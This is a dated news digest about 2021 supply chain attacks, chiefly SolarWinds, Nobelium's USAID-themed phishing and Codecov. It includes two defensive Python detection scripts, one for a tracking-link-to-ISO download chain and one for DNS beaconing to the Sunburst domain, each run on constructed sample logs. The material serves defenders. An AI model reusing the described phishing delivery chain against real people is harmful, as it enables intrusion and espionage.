(May 31, 2021)


Why are supply chain attacks so dangerous?

By compromising a single supplier, spies or saboteurs can hijack its distribution systems to turn any application they sell, any software update they push out, even the physical equipment they ship to customers, into Trojan horses. With one well-placed intrusion, they can create a springboard to the networks of a supplier's customers—sometimes numbering hundreds or even thousands of victims.

Ref - Wired

 _______________________________________________________________________________________

(May 31, 2021)


SolarWinds and Colonial Pipeline crisis showed 7 ways to respond to cyberattacks

The federal government and other agencies have demonstrated several crisis management best practices in response to the recent cyberattacks against SolarWinds and Colonial Pipeline. Business leaders should keep these best practices in mind when they have to deal with cyberattacks—and other crisis situations—at their companies and organizations.

Ref - Forbes

_______________________________________________________________________________________

(May 30, 2021)


Defending and deterring the Nobelium attacks

Microsoft provided several recommendations for protection against attacks like SolarWinds. The first step is to opt for better defense. The best defense, according to Microsoft, is to move to the cloud, where the most secure technology from any cloud provider is always up to date, and where the fastest security innovations are occurring. The second step is to deter damaging attacks. Clearer rules for nation-state conduct need to be defined and agreed to by the international community.

Ref - Microsoft 

_______________________________________________________________________________________

(May 29, 2021)


Biden budget sets aside $750 million for SolarWinds response

U.S. President Joe Biden's proposed budget includes $750 million for the government agencies hit by the SolarWinds hack to pay for cybersecurity improvements to prevent another attack. The money comes on top of a $500 million fund for federal cybersecurity as the U.S. government recovers from the cyberattack that hit nine agencies including the State Department and Treasury.

Ref - Yahoo
 
_______________________________________________________________________________________

(May 28, 2021)


Breaking down Nobelium’s latest early-stage toolset

Each of the NOBELIUM tools is designed for flexibility, enabling the actor to adapt to operational challenges over time. Microsoft Threat Intelligence Center (MSTIC) has released an appendix of indicators of compromise (IOCs) for the community to better investigate and understand NOBELIUM’s most recent operations.

Ref - Microsoft 

_______________________________________________________________________________________

(May 28, 2021)


Sophisticated spear-phishing campaign targets Government organizations, IGOs, and NGOs

CISA and FBI acknowledge open-source reporting attributing the activity discussed in the report to APT29 (also known as Nobelium, The Dukes, and Cozy Bear). However, CISA and FBI are investigating this activity and have not attributed it to any threat actor at this time. CISA and FBI urge governmental and international affairs organizations and individuals to adopt a heightened state of awareness and implement the recommendations specified in its advisory.

Ref - CISA 

_______________________________________________________________________________________

(May 28, 2021)


The key lesson from the SolarWinds hack is visibility

The SolarWinds attack has laid bare the interconnectedness of IT infrastructure: if most of the government and business infrastructure uses overlapping software packages, they are clearly not as separate from one another as they would like to think. Vulnerabilities could be anywhere throughout the supply chain. Why would hackers attack a single end-user when they can backdoor their way into all of them at once via a single service platform?

Ref - CIO 

_______________________________________________________________________________________

(May 28, 2021)


How Nobelium leveraged Constant Contact in the Phishing campaign

The May 25 phishing campaign included several iterations of emails sent from USAID's Constant Contact account. In one example, the emails appeared to originate from USAID, posing as an “alert” dated May 25, 2021. If the user clicked the link in the email, the URL first led to the legitimate Constant Contact service and then redirected to Nobelium-controlled infrastructure, which delivered a malicious ISO file to the system.

Ref - CRN
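The delivery chain above (legitimate mail-marketing tracking link, redirect to attacker infrastructure, ISO download) leaves a recognizable trace in a web proxy: a client that clicks a tracking link and within seconds pulls an ISO from a host it was redirected to. The following is an added example, not from CRN or Microsoft's reporting: detection logic that walks proxy records and raises an alert for exactly that sequence, while leaving a plain ISO download from elsewhere alone. The log format, hostnames, client addresses and the 60-second window are constructed for the example; map them onto your proxy's fields.

```python
"""Added example, not from CRN or Microsoft's reporting: detection logic that
walks web-proxy records and flags a client that clicked a mail-marketing
tracking link and, shortly after, pulled an ISO image from the host the
tracking link redirected to.

Assumptions (not from the article): the log format, the hostnames, the
client addresses and the 60-second window are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List
from urllib.parse import urlparse

# Hostnames of legitimate bulk-mail click-tracking services you expect to see.
TRACKING_DOMAINS = {"links.mailer.invalid"}
WINDOW = timedelta(seconds=60)

# Constructed proxy log: "timestamp client method url status content-type referer"
SAMPLE_LOG = """\
2021-05-25T14:02:10Z 10.0.0.12 GET https://links.mailer.invalid/track/abc 302 text/html -
2021-05-25T14:02:11Z 10.0.0.12 GET https://cdn-update.invalid/alert.iso 200 application/x-iso9660-image https://links.mailer.invalid/track/abc
2021-05-25T14:03:00Z 10.0.0.15 GET https://links.mailer.invalid/track/def 302 text/html -
2021-05-25T14:03:01Z 10.0.0.15 GET https://www.agency.invalid/newsletter 200 text/html https://links.mailer.invalid/track/def
2021-05-25T15:10:00Z 10.0.0.20 GET https://mirror.distro.invalid/os.iso 200 application/x-iso9660-image -
"""


def parse(log: str) -> List[Dict[str, object]]:
    events = []
    for line in log.splitlines():
        ts, client, method, url, status, ctype, referer = line.split(" ", 6)
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "client": client, "method": method, "url": url,
                       "status": int(status), "ctype": ctype, "referer": referer})
    return events


def is_iso_download(ev: Dict[str, object]) -> bool:
    return (ev["ctype"] == "application/x-iso9660-image"
            or urlparse(str(ev["url"])).path.lower().endswith(".iso"))


def is_tracking_click(ev: Dict[str, object]) -> bool:
    host = urlparse(str(ev["url"])).hostname
    return host in TRACKING_DOMAINS and 300 <= int(ev["status"]) < 400


def find_iso_after_tracking_click(log: str) -> List[Dict[str, str]]:
    """For each client, pair every ISO download with an earlier tracking-link
    redirect from the same client that is within WINDOW or is the referer."""
    by_client: Dict[str, List[Dict[str, object]]] = defaultdict(list)
    for ev in parse(log):
        by_client[str(ev["client"])].append(ev)
    alerts = []
    for client, events in by_client.items():
        events.sort(key=lambda e: e["ts"])
        for i, ev in enumerate(events):
            if not is_iso_download(ev):
                continue
            for prior in events[:i]:
                recent = ev["ts"] - prior["ts"] <= WINDOW
                referred = ev["referer"] == prior["url"]
                if is_tracking_click(prior) and (recent or referred):
                    alerts.append({"client": client, "iso_url": str(ev["url"]),
                                   "tracking_url": str(prior["url"]),
                                   "landing_host": str(urlparse(str(ev["url"])).hostname)})
                    break
    return alerts


if __name__ == "__main__":
    for alert in find_iso_after_tracking_click(SAMPLE_LOG):
        print(alert)
```

The rule deliberately keys on the sequence rather than on the tracking domain alone, because the tracking service is legitimate and clicked constantly; the ISO landing host is the pivot worth blocking and hunting across other clients.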

 _______________________________________________________________________________________

(May 28, 2021)


Almost 3,000 emails targeted by Nobelium attack

The threat actor behind last year's major SolarWinds hack has led a new targeted campaign spanning nearly 3,000 emails. According to reports, the hackers accessed the Constant Contact account of USAID, the service the agency uses for email marketing. From there, Nobelium distributed phishing emails whose links, when clicked, delivered a malicious file used to install a backdoor called NativeZone.

Ref - ARNNet 

_______________________________________________________________________________________

(May 28, 2021)


The group behind SolarWinds hack now targeting government agencies, NGOs - Microsoft

The group behind the SolarWinds cyberattack is now targeting government agencies, think tanks, consultants, and non-governmental organizations, Microsoft Corp said late on Thursday. While organizations in the United States received the largest share of attacks, targeted victims came from at least 24 countries, Microsoft said.

Ref - Reuters 

_______________________________________________________________________________________

(May 28, 2021)


Russia appears to carry out a hack through the system used by the U.S. Aid Agency

By breaching the systems of a supplier used by the federal government, the hackers sent out emails as recently as this week from more than 3,000 genuine-looking accounts. The email was implanted with code that would give the hackers unlimited access to the computer systems of the recipients, from stealing data to infecting other computers on a network.


 _______________________________________________________________________________________

(May 27, 2021)


Another Nobelium Cyberattack

Microsoft has observed cyberattacks by the threat actor Nobelium targeting government agencies, think tanks, consultants, and non-governmental organizations. This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations. By piggybacking on software updates and now mass email providers, Nobelium increases the chances of collateral damage in espionage operations and undermines trust in the technology ecosystem.

Ref - Microsoft 

_______________________________________________________________________________________

(May 27, 2021)


Attack on Fujitsu’s ProjectWEB SaaS platform may be the next big supply chain attack

While still early, some researchers view the reported hacking into Fujitsu’s ProjectWEB software-as-a-service (SaaS) platform as a nation-state attack, not unlike the one that targeted the SolarWinds supply chain. Impacted agencies include the Ministry of Land, Infrastructure, Transport, and Tourism; the Ministry of Foreign Affairs; the Cabinet Secretariat; and Narita Airport in Tokyo.

Ref - SC Magazine 

_______________________________________________________________________________________

(May 27, 2021)


Canada Post falls victim to a third-party hack

Canada Post is the latest victim of a supply chain attack that allowed hackers to capture the names and addresses of almost one million senders and receivers of packages over a three-year period. This was the result of a cyberattack on its electronic data interchange (EDI) solution supplier, Commport Communications, which manages the shipping manifest data of large parcel business customers.


_______________________________________________________________________________________

(May 26, 2021)


The EU’s response to SolarWinds

Unofficial reports indicate that a number of EU member states are toying with the idea of introducing sanctions against Russian citizens who were allegedly involved in the SolarWinds campaign. Also, given the steady deterioration of EU-Russia relations in recent months, member states could be tempted to demonstrate their collective determination to push back against Russia and their commitment to the transatlantic alliance.

Ref - CFR 

_______________________________________________________________________________________

(May 26, 2021)


Newly discovered bugs in VSCode extensions could lead to supply chain attacks

Severe security flaws uncovered in popular Visual Studio Code extensions could enable attackers to compromise local machines as well as build and deployment systems through a developer's integrated development environment (IDE). The vulnerable extensions could be exploited to run arbitrary code on a developer's system remotely, in what could ultimately pave the way for supply chain attacks.


 _______________________________________________________________________________________

(May 26, 2021)


How SolarWinds changed cybersecurity leadership's priorities

The recent Scale survey showed that in wake of SolarWinds attacks, security leaders are retooling their security operations in response to the changing threat environment. For instance, 36% said that they expected third-party risks to rise over the next 12 months. Around 47% said third-party risks are a top factor affecting the C-suite's understanding of the business impact of security, behind data breaches at 57% and remote work at 54%.


_______________________________________________________________________________________

(May 26, 2021)


Federal Agencies struggling with supply chain security

More than five months after the SolarWinds supply chain attack came to light, federal agencies continue to struggle with supply chain security, according to a Government Accountability Office official. In the absence of foundational risk management practices, malicious actors may continue to exploit vulnerabilities in the ICT supply chain, causing further disruption to mission operations, harm to individuals, or theft of intellectual property.


_______________________________________________________________________________________

(May 25, 2021)


Supply chain attacks: How to reduce open-source vulnerabilities

Organizations are increasingly turning to adversary simulation engagements to reduce the impact of supply chain attacks. In these tests, a ‘red’ team uses the same tactics, techniques, and procedures that threat actors employ. The ‘blue’ team responds to the attacks from the red team. They’ll gain valuable knowledge by combating the same tools threat actors are currently using.


_______________________________________________________________________________________

(May 25, 2021)


How to avoid web supply chain attacks

The simplest thing that you may expect for secure interaction with your suppliers is that your contractors should present you with a web vulnerability scanner compliance report, such as the OWASP Top-10 report offered by Acunetix. This type of report will immediately show you if the software that you are purchasing has any vulnerabilities and if these are the types of vulnerabilities that you should worry about.


_______________________________________________________________________________________

(May 25, 2021)


Three-quarters of CISOs predict another SolarWinds-style attack

Some 84% of global organizations have suffered a serious security incident over the past two years and a majority are expecting another SolarWinds-style supply chain attack, according to a new Splunk report.


_______________________________________________________________________________________

(May 25, 2021)


Tailor security training to developers to tackle software supply chain risks

A lack of cohesion between software development teams and cybersecurity functions compounds the software supply chain risks faced by organizations, making it all the more urgent for cybersecurity leaders and their teams to better engage with and educate developers. The training must be tailored to address the specific cyber risks surrounding the software development lifecycle.

Ref - CSO Online 

_______________________________________________________________________________________

(May 24, 2021)


Recent cyberattacks signal alarm for better supply chain security

There are three important lessons from the fallout of recent major cyber incidents, including the SolarWinds attacks. Any organization leveraging third-party software must not take its convenience and claims of being secure at face value but pay attention to the integrity of the services it uses. There must be a focus on container security. Before integrating a third-party service, organizations need to ensure that these vendors’ security standards are up to par.

 
_______________________________________________________________________________________

(May 24, 2021)


SolarWinds, Exchange attacks revive calls for mandatory breach notification

On the heels of three major cybersecurity incidents over the past six months—the SolarWinds and Microsoft Exchange supply chain attacks and the Colonial Pipeline ransomware attack—government officials and some in the private sector are reviving calls for better information sharing and national breach notification requirements.

Ref - CSO Online 

_______________________________________________________________________________________

(May 21, 2021)


E-commerce giant Mercari suffers major data breach in Codecov incident

E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack. The company has confirmed that tens of thousands of customer records, including financial information, were exposed to external actors due to the Codecov breach.


_______________________________________________________________________________________

(May 21, 2021)


Department of Veterans Affairs not a victim of SolarWinds hack

The Department of Veterans Affairs (VA) was not a victim of the sweeping SolarWinds hacking campaign, the department’s top cyber official told lawmakers. Paul Cunningham, chief information security officer of VA, said there was no evidence of compromise across its wide-ranging and complex networks. He told lawmakers this finding was reaffirmed in separate investigations by the CISA and the intelligence community.

Ref - Fed Scoop
 
_______________________________________________________________________________________

(May 20, 2021)


12 lessons learned from the SolarWinds breach

CRN spoke with 12 prominent C-suite executives at RSA Conference 2021 about the biggest lessons learned from one of the most infamous cyberattacks of all time. The result is 12 major takeaways from the SolarWinds breach, ranging from applying far greater scrutiny to technology suppliers and to code used during the application development process, to eliminating the use of on-premises Microsoft Active Directory.

Ref - CRN 

_______________________________________________________________________________________

(May 20, 2021)


SolarWinds attack dates back to at least January 2019

Hackers were present in SolarWinds' systems as early as January 2019, months earlier than previously reported, SolarWinds President and CEO Sudhakar Ramakrishna revealed during an appearance at the 2021 RSA Conference (RSAC). The entry point was the SolarWinds Orion software. Attackers compromised the SolarWinds system for distributing software updates and used that to spread malware to its customers.

Ref - PCMag 

_______________________________________________________________________________________

(May 19, 2021)


SentinelOne: More supply chain attacks are coming

Large-scale supply chain attacks are here to stay, according to Marco Figueroa, the principal threat researcher at SentinelOne. During an RSA Conference 2021 session, Figueroa dissected Sunburst, the malware used to compromise SolarWinds' Orion platform that led to an extensive supply chain attack on dozens of organizations.

Ref - TechTarget 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds CEO provides new details into attack and response

New details into the notorious SolarWinds nation-state attack and its fallout were provided by Sudhakar Ramakrishna, CEO of SolarWinds, during a keynote session on Day 3 of the virtual RSA Conference 2021. This included the revelation that the attackers may have accessed the system as early as January 2019 and an expression of remorse for comments made during his congressional appearance about the attack in February 2021.


_______________________________________________________________________________________

(May 19, 2021)


monday.com source code has been accessed by Codecov threat actors

monday.com has revealed it had suffered a Codecov supply-chain attack that recently impacted several organizations. During the cyberattack, threat actors accessed a read-only copy of its source code. The cyberattack occurred around January 31, 2021, when cybercriminals obtained private access to hundreds of networks belonging to Codecov’s users.


_______________________________________________________________________________________

(May 19, 2021)


How CISA limited the impact of the SolarWinds attack

Soon after the specifics about the SolarWinds attack came to light, the DHS went to work to limit the damage. Among the first things it did was put the attack signatures into the EINSTEIN toolset that is used by nearly every agency. EINSTEIN was extremely useful in terms of identifying suspicious network traffic from a handful of federal civilian agencies that upon further investigation by those agencies helped identify additional victims of this campaign.


_______________________________________________________________________________________

(May 19, 2021)


Pentagon’s CMMC compliance may block a SolarWinds-style attack

The Pentagon’s Cybersecurity Maturity Model Certification (CMMC) program is designed to be one key line of defense. The program sets out five maturity models applicable to defense industrial base contractors based on the level of sensitivity of information stored in their systems. Under the program, obtaining a certification of compliance at the appropriate risk level is an allowable cost. However, the extent to which contractors may have to dig into their own pockets to obtain certification is a running concern.

Ref - FCW 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds CEO apologizes for blaming an intern

Sudhakar Ramakrishna, the former CEO of Pulse Secure who took the top job at SolarWinds, apologized for the way the company blamed an intern for using a weak password - solarwinds123 - during early testimony before Congress. When asked about the password, former SolarWinds CEO Kevin Thompson said the password was a mistake that an intern made. Ramakrishna also told lawmakers that the password was from an intern’s GitHub account.

Ref - The Record 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds - a harbinger for a national data breach reporting law

As the SolarWinds attack showed, the conversation around federal data breach reporting legislation is becoming increasingly relevant. FireEye’s public disclosure of the SolarWinds attack exemplified the benefits of proactive partnerships between the government and private sector, which have been strengthened over the years by routine information sharing and other initiatives.

Ref - Duo 

_______________________________________________________________________________________


(May 18, 2021)


Government eyes new rules to tighten security against supply chain attacks

The Department for Digital, Culture, Media, and Sport (DCMS) has put out a call for views on the new rules, which may require IT service providers and managed services providers (MSPs) to undergo the same cybersecurity assessments that critical national infrastructure providers do.

Ref - ZDNet 

_______________________________________________________________________________________

(May 18, 2021)


Russian denial regarding SolarWinds hack is 'unconvincing'

Russia's denial of involvement in the SolarWinds hack is "unconvincing", the former head of GCHQ's National Cyber Security Centre has said. And Prof Ciaran Martin said there was evidence the tactics, techniques, and tools used by the hackers matched many years of SVR activity.

Ref - BBC 

_______________________________________________________________________________________

(May 18, 2021)


Russian spy chief denies SolarWinds attack

Russia's spy chief denied responsibility for the SolarWinds cyber attack but said he was "flattered" by the accusations from the U.S. and Britain that Russian foreign intelligence was behind such a sophisticated hack. Naryshkin said he did not want to accuse the U.S. of being behind the attack but quoted from documents leaked by former NSA contractor Edward Snowden to suggest that the tactics of the attack were similar to those used by U.S. and British intelligence agencies.

Ref - Reuters 

_______________________________________________________________________________________

(May 17, 2021)


Disconnect Internet for 3-5 days to evict SolarWinds hackers from the network

The newly published analysis report, AR21-134A, details resource-intensive and highly complex steps that will require disconnecting the enterprise network from the internet for three to five days. It is tailored for federal agencies that used affected versions of SolarWinds Orion and which discovered adversary activity within their environments (Category 3 agencies).


_______________________________________________________________________________________

(May 16, 2021)


SolarWinds breach exposes hybrid multi-cloud security weaknesses

Exposing severe security weaknesses in hybrid cloud, authentication, and least privileged access configurations, the high-profile SolarWinds breach laid bare just how vulnerable every business is. Enterprise leaders must see beyond the much-hyped baseline levels of identity and access management (IAM) and privileged access management (PAM) now offered by cloud providers.

Ref - VentureBeat 

_______________________________________________________________________________________

(May 14, 2021)


Supplemental direction (v4) on the implementation of CISA Emergency Directive (ED) 21-01

Agencies that have or had networks that used affected versions of SolarWinds Orion and have evidence of follow-on threat actor activity, such as binary beaconing to avsvmcloud[.]com and secondary C2 activity to a separate domain or IP address, including networks hosted by third parties on behalf of federal agencies, must comply with the applicable requirements for each network meeting respective conditions.

Ref - DHS
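
As an added example (not code from the page, CISA or DHS), the following Python triages a constructed DNS query log for the beaconing condition in the direction above: it flags clients that resolved any name under avsvmcloud.com and lists their later queries to domains outside an assumed baseline allowlist as candidates for secondary C2 review. The log format, the allowlist, the long subdomain label and the placeholder-c2.example name are all assumptions made for the demo.

```python
"""Added example: triage DNS query logs for the ED 21-01 beaconing condition.

This is illustrative code written for this page, not from CISA, DHS or any
vendor tool. The log format, baseline allowlist and sample names below are
constructed assumptions.
"""
import re

# Domain named in the supplemental direction (kept defanged as written on the page).
BEACON_DOMAIN_DEFANGED = "avsvmcloud[.]com"

# Constructed allowlist of registrable domains treated as normal in this
# example environment (an assumption, not a recommendation for any real site).
BASELINE_DOMAINS = {"windowsupdate.com", "solarwinds.com"}

# Constructed log in an assumed "<ISO timestamp> <client IP> <queried name>"
# format; the random-looking label and placeholder-c2.example are made up.
# One line is deliberately out of order and one is junk, to exercise parsing.
SAMPLE_DNS_LOG = """\
2020-06-12T10:01:00Z 10.0.4.17 ctldl.windowsupdate.com
2020-06-11T08:02:13Z 10.0.4.17 ctldl.windowsupdate.com
2020-06-11T08:05:41Z 10.0.4.17 k3xr02mqvb7h1z.constructed-label.avsvmcloud.com
2020-06-11T08:06:02Z 10.0.4.22 downloads.solarwinds.com
2020-06-11T09:17:55Z 10.0.4.17 update.placeholder-c2.example
2020-06-12T10:00:00Z 10.0.4.30 notavsvmcloud.com
garbage line that should be skipped
"""

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)\s+(\S+)\s+(\S+)\s*$")


def refang(indicator: str) -> str:
    """Convert a defanged name such as avsvmcloud[.]com to a real DNS name."""
    return indicator.replace("[.]", ".").replace("(.)", ".").strip().lower().rstrip(".")


def is_under(qname: str, domain: str) -> bool:
    """True when qname is domain itself or a subdomain of it. The match is
    label aligned, so notavsvmcloud.com does not match avsvmcloud.com."""
    q = qname.lower().rstrip(".")
    return q == domain or q.endswith("." + domain)


def registered_domain(qname: str) -> str:
    """Crude registrable-domain heuristic (last two labels). A public suffix
    list would be needed for names such as example.co.uk; kept simple here."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_log(log_text: str) -> list:
    """Parse lines into (timestamp, client, qname) tuples, skipping junk, and
    sort by timestamp so 'after the first beacon' is well defined."""
    rows = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append(m.groups())
    return sorted(rows)  # ISO-8601 UTC timestamps sort correctly as strings


def triage(log_text: str, beacon_domain: str = BEACON_DOMAIN_DEFANGED,
           baseline: set = BASELINE_DOMAINS) -> dict:
    """Per client that resolved the beacon domain, record the first beacon
    time, every beacon query, and later queries to domains outside the
    baseline (the candidates an analyst reviews for secondary C2)."""
    beacon = refang(beacon_domain)
    findings = {}
    for ts, client, qname in parse_log(log_text):
        if is_under(qname, beacon):
            entry = findings.setdefault(client, {"first_beacon": ts,
                                                "beacon_queries": [],
                                                "later_unbaselined": []})
            entry["beacon_queries"].append(qname)
        elif client in findings and registered_domain(qname) not in baseline:
            findings[client]["later_unbaselined"].append(qname)
    return findings


if __name__ == "__main__":
    for client, info in triage(SAMPLE_DNS_LOG).items():
        print(client, "first beacon at", info["first_beacon"])
        for name in info["later_unbaselined"]:
            print("  review later query:", name)
```

A hit on the beacon domain alone places a network in the first condition above; the later queries list is only a starting point for confirming or ruling out secondary C2 activity.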

_______________________________________________________________________________________

(May 14, 2021)


Guidance for networks affected by the SolarWinds and Active Directory/M365 Compromise

Remediation plans for dealing with malicious compromises are necessarily unique to every organization, and success requires careful consideration. There are three phases for evicting the actor: Pre-Eviction (actions to detect and identify APT activity and prepare the network for eviction); Eviction (actions to remove the APT actor from on-premises and cloud environments); and Post-Eviction (actions to ensure eviction was successful and the network has good cyber posture).

Ref - CISA 

_______________________________________________________________________________________

(May 14, 2021)


Effective tactics to prevent supply chain attacks

Upguard recommends several strategies to have the highest chances of preventing supply chain attacks. This includes implementing Honeytokens, having a secure Privileged Access Management, and implementing a Zero Trust Architecture. In addition, it recommends identifying all potential insider threats, protecting vulnerable resources, and minimizing access to sensitive data.

Ref - Upguard 

_______________________________________________________________________________________

(May 14, 2021)


Rapid7 source code, alert data accessed in Codecov supply chain attack

Rapid7 has disclosed the compromise of customer data and partial source code due to the Codecov supply chain attack. The cybersecurity firm said it was one of the victims of the incident, in which an attacker obtained access to the Codecov Bash uploader script.

Ref - ZDNet
 
_______________________________________________________________________________________

(May 13, 2021)


Addressing SolarWinds through executive action

The Executive Order (EO) on cybersecurity is a much-needed step toward shoring up the nation’s cyber posture. On the heels of last week’s damaging ransomware attack on Colonial Pipeline, this EO is a necessary step forward. While the EO will not solve all of the security problems or prevent the next SolarWinds attack – and the truth is no single policy, government initiative, or technology will – it is a great start. 

Ref - Forbes 

_______________________________________________________________________________________

(May 13, 2021)


Third-party software may leave you vulnerable to cyberattacks

Leaders need new ways to reduce supply chain cybersecurity risks, whether they’re buying digital products or producing them. The data showed that managers often fall prey to counterproductive and possibly dangerous mindsets that get in the way of securing supply chains and leave their companies exposed — and that they’re often taking cues from the top.

Ref - HBR 

_______________________________________________________________________________________

(May 13, 2021)


Some implicitly trusted infrastructure areas can lead to supply chain compromises

Supply chains are vast, and this is by no means a comprehensive list of potential problems. A threat modeling exercise within the organization can give a more robust view of vulnerable infrastructure that is often overlooked. Users should take a concentrated look at the implicit trust relationships that they have with vendors and open-source software used in their build or manufacturing process and they will likely find many areas where trust supersedes security.


_______________________________________________________________________________________

(May 12, 2021)


How Biden’s new executive order plans to prevent another SolarWinds attack

The Biden administration has been drafting the order over the last few months. It is designed less to address an incident like the one experienced by Colonial Pipeline, a privately owned critical infrastructure operator that is believed to have been hit by a criminal gang, than to prevent a future SolarWinds-like incident.

 
_______________________________________________________________________________________

(May 12, 2021)


Senate hearing raises questions about SolarWinds backdoors

The U.S. Department of Commerce's CISO said during a Senate committee hearing Tuesday that his agency was one of the first to identify a SolarWinds-related compromise, raising questions about when the U.S. government initially detected the supply chain attacks.

 
_______________________________________________________________________________________

(May 12, 2021)


Supply chain penetration: Here’s how to protect from them

Effective protection of the supply chain means the adoption of a different mindset, one that assumes a breach will happen at some point. Because the supply chain represents a critical attack vector, an attack in this area could be a critical one, so cyber measures must be stepped up accordingly. Securing access to sensitive data and systems means organizations can reduce the risks significantly, thereby making it more difficult for attackers to achieve their end goals.


_______________________________________________________________________________________

(May 11, 2021)


Senators discuss federal cybersecurity following SolarWinds hack

Government officials say the 2020 SolarWinds cyber hack by the Russian government should have been a wake-up call. The U.S. is instead dealing with another cyber attack, this time on the largest fuel pipeline in the country. The SolarWinds and Pulse Secure VPN attacks targeted federal agencies and yet it was private sector companies that discovered them.

Ref - News10 

_______________________________________________________________________________________

(May 11, 2021)


Key challenges with modern AppSec and supply chain attacks

The OWASP API project has enumerated 10 critical API level threats that are substantially more important in the era of modern, cloud-native applications. The three key trends – microservice proliferation, application change, and porous perimeters – create an environment where attacks can flourish and where IT and security teams need to consider revisiting their application security practices and controls.

Ref - DevOps 

_______________________________________________________________________________________

(May 11, 2021)


SolarWinds CEO calls for collective action against state attacks

SolarWinds CEO Sudhakar Ramakrishna has revealed he is talking with his peers in the industry to form a consortium of like-minded, mid-market firms that could take collective action to defend themselves against nation state-backed malicious actors, such as Russia’s APT29, or Cozy Bear. Ramakrishna called for the industry to adopt a model of mutual responsibility and mutual accountability among smaller firms, noting that size alone is not an indicator of a company’s ability to protect itself from cyber attacks.


_______________________________________________________________________________________

(May 10, 2021)


Twilio, HashiCorp among Codecov supply chain hack victims

The stealth software supply chain compromise of the Codecov Bash Uploader went undetected since January. The first company to publicly acknowledge exposure was HashiCorp when a post-breach investigation found a subset of its CI pipelines used the affected Codecov component. Following HashiCorp’s statement, San Francisco-based Twilio issued an advisory to confirm it used the compromised Bash Uploader component in a small number of projects and CI pipelines.


_______________________________________________________________________________________

(May 10, 2021)


All you need to know about supply chain attacks and cloud-native

There are several characteristics of cloud-native application development environments that make them a lucrative target for attackers looking to embed malicious code into the supply chain. Cloud-native application development is characterized by the widespread use of open source components, often obtained from public registries. Additionally, container images, functions, and packages are updated frequently using CI/CD pipelines, creating multiple opportunities for attackers to embed themselves into the process.

Ref - TheNewStack 

_______________________________________________________________________________________

(May 10, 2021)


Cisco Threat Explainer: Supply Chain Attacks

There is a general pattern in supply chain attacks. First, the bad actors gather what information they can find about the primary target. Next, the bad actors attempt to compromise the secondary target. Once in, the attackers move laterally, their objective often being to compromise the secondary target’s software build system, where the source code for their software is stored, updated, and compiled.

Ref - Cisco 

_______________________________________________________________________________________

(May 10, 2021)


NIST and CISA release guidelines for defense against software supply chain attacks

CISA and NIST have released new guidelines on defending against various software supply chain risks. The agencies listed update hijacking, tampering with code signing, and the compromise of open-source code as the popular methods used by hackers to compromise software. Threat actors hijack update channels, as in the Russian NotPetya attack on Ukraine via tax accounting software. The SolarWinds Orion software supply chain attack employed similar tactics.

Ref - CPO Magazine 

_______________________________________________________________________________________

(May 10, 2021)


Ransomware attack on CaptureRx exposes multiple providers across the U.S.

Multiple healthcare providers across the United States are reporting being impacted by a ransomware attack on CaptureRx, a San Antonio-based company providing drug-related administrative services. The CaptureRx attack highlights the impact of the software supply chain, and Faxton St. Luke’s Healthcare in New York, Randolph, VT-based Gifford Health Care, and Thrifty Drug Stores are just a few of the victims.

Ref - ZDNet 

_______________________________________________________________________________________

(May 10, 2021)


The Colonial Pipeline ransomware attack and the SolarWinds hack were all but inevitable

Software supply chains and private sector infrastructure companies are vulnerable to hackers. Many U.S. companies outsource software development because of a talent shortage, and some of that outsourcing goes to companies in Eastern Europe that are vulnerable to Russian operatives.

Ref - Yahoo 

_______________________________________________________________________________________

(May 10, 2021)


SolarWinds shares more information on cyberattack impact, initial access vector

Texas-based IT management company SolarWinds shared more information on the impact of the significant breach disclosed late last year, and claimed that less than 100 of its customers were actually hacked. The company said the attacker only targeted its build system for the Orion product, but did not actually modify any source code repository, and the SUNBURST malware has not been found in any other product.


_______________________________________________________________________________________

(May 8, 2021)


Best practices to reduce supply chain cyber exposure

Cyber-attacks against the supply chain continue to grow — and some are simply impossible to eliminate. With that in mind, consider an approach rooted in cyber risk management. Whereas a traditional cybersecurity approach focuses primarily on mitigation, cyber risk management understands that not all risks can be removed and not all attacks can be prevented, especially when it comes to the supply chain.

Ref - Marsh
 
_______________________________________________________________________________________

(May 8, 2021)


SolarWinds says Russian Group likely took data during the cyberattack

While SolarWinds doesn’t know how the Russia-backed group broke into its networks, the company believes the hackers may have used an unknown vulnerability, a brute-force attack, or social engineering, such as a phishing operation. The hackers then conducted “research and surveillance” on the company, including its Microsoft Office 365 environment, for at least nine months prior to October 2019, when they moved to the “test run” phase of the attack.

Ref - Bloomberg 

_______________________________________________________________________________________

(May 8, 2021)


SolarWinds says Russian group likely took data during cyber-attack

The Russia-linked hackers that compromised popular software by the Texas-based firm SolarWinds last year broke into email accounts and likely took data from the firm. SolarWinds said it found “evidence that causes us to believe the threat actor exfiltrated certain information as part of its research and surveillance.”


_______________________________________________________________________________________

(May 7, 2021)


Hackers accessed SolarWinds’ Office 365 since early 2019

Hackers persistently accessed SolarWinds’ internal systems, Microsoft Office 365 environment, and software development environment for months before carrying out their vicious cyberattack. Hackers compromised SolarWinds’ credentials and conducted research and surveillance via persistent access for at least nine months prior to their October 2019 trial run.

Ref - CRN 

_______________________________________________________________________________________

(May 7, 2021)


US-UK Government warns about SolarWinds attackers adding a new tool to its arsenal

Agencies in the U.S. and the U.K. published a joint report providing more details on the activities of the Russian cyberspy group that is believed to be behind the attack on IT management company SolarWinds. The report reveals that the hackers started using the open-source adversary simulation framework Sliver after some of their operations were exposed.

Ref - SecurityWeek 

_______________________________________________________________________________________

(May 7, 2021)


An investigative update of the cyberattack

SolarWinds has revealed that it has found evidence that the threat actor exfiltrated certain information as part of its research and surveillance. The threat actor created and moved files that contained source code for both Orion Platform software and non-Orion products. The threat actor created and moved additional files, including a file that may have contained data supporting SolarWinds’ customer portal application. The threat actor accessed email accounts of certain personnel, and also moved files to a jump server, which was possibly intended to facilitate exfiltration of the files out of the environment.

Ref - SolarWinds 

_______________________________________________________________________________________

(May 7, 2021)


